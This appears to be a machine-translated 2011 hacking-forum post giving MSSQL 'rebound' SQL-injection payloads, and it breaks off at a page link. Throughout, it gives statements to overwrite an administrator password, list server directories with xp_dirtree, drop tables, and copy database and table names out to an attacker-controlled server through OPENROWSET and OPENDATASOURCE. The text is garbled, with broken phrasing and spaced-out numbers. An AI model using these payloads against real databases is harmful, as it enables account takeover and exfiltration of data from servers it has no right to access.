Mssql rebound injection record collection-vulnerability warning-the black bar safety net

2011-07-05T00:00:00
ID MYHACK58:62201131143
Type myhack58
Reporter 佚名
Modified 2011-07-05T00:00:00

Description

One night a study of SA injection point when Hua B to I came some information

Made up to do a recording. Skull more and more bad with the Hey

Change the administrator password

‘;update [user] set [pwd]=’1519804e89226cf9893a05d9e3fc8bbb’ where [LogonName]=’hmingming’;–


Column directory

create database test(performed locally built library)

(Local execution in the above TEST libraries built on tables and fields)

use test create table temp(id nvarchar(2 5 5),num1 nvarchar(2 5 5),num2 nvarchar(2 5 5),num3 nvarchar(2 5 5))


Test whether the and the local data connection, the injection point is performed

insert into openrowset('sqloledb','server=x. x. x. x,1 4 3 3;uid=fuck;pwd=caonima','select id from test. dbo. temp1') select name from master. dbo. sysdatabases--

netstat-an | find "1 4 3 3"local execution

create table temp(id nvarchar(2 5 5),num1 nvarchar(2 5 5),num2 nvarchar(2 5 5),num3 nvarchar(2 5 5))–

Local execution, in the test this database with the Query Analyzer

‘;drop table temp–a injection point implementation, in order to avoid and already have a table occurrence of the conflict


(Injection point implementation, the construction of the table and field convenient the following statement insert

‘;create table temp(id nvarchar(2 5 5),num1 nvarchar(2 5 5),num2 nvarchar(2 5 5),num3 nvarchar(2 5 5))–


‘;insert into temp(id,num1,num2) exec master. dbo. xp_dirtree ‘D:\www\jiage\’,1,1–

(The injection point implementation, the column directory and inserting into TEMP table)


(Injection point implementation, the column directory copied to the test library to the TEMP1 table

';insert into

opendatasource('sqloledb','server=x. x. x. x,1 4 3 3;uid=fuck;pwd=caonima;database=test'). test. dbo. temp1 select * from temp--


select * from temp1 local execution, listing directories, Hey, Hey)

‘;delete temp–(injection point, the empty data table

delete temp1 local Query Analyzer to execute, empty data table

Despise black hands Peng ultra select * from the temp–turned out written into the select temp from temp–


Guess table

The following statement for the local execution

create database lcx built library

Create TABLE ku(name nvarchar(2 5 6) null); built table, easy the following query to the database name is copied to this table.

Create TABLE biao(id int NULL,name nvarchar(2 5 6) null); built table, easy the following query to show the Copy to the table

In/nvarchar is the data type and 2 5 6 is the length of the data null is not any record of easy birds to read(remember I love birds/


(The injection point implementation, the query to the server all the database name to copy to just the new ku this table, go and see a local look at the lcx this database ku this table return all rows. there are surprises yo)

';insert into opendatasource('sqloledb','server=x. x. x. x,1 4 3 3;uid=fuck;pwd=caonima;database=lcx'). lcx. dbo. ku select name from master. dbo. sysdatabases--


(The injection point to perform to get the current database name, before execution in a local empty out the above statement to leave the garbage, what? Wouldn't you? MYGOD delete ku local Query Analyzer, switch to the lcx library to perform)

';Insert into opendatasource('sqloledb','server=x. x. x. x,1 4 3 3;uid=fuck;pwd=caonima;database=lcx'). lcx. dbo. ku select db_name(0)--


(The injection point implementation, the query to the server all the current database table name to copy to just the new biao in the table, and went to see a local look at the lcx this database biao this table return all rows. there are surprises yo)

[1] [2] next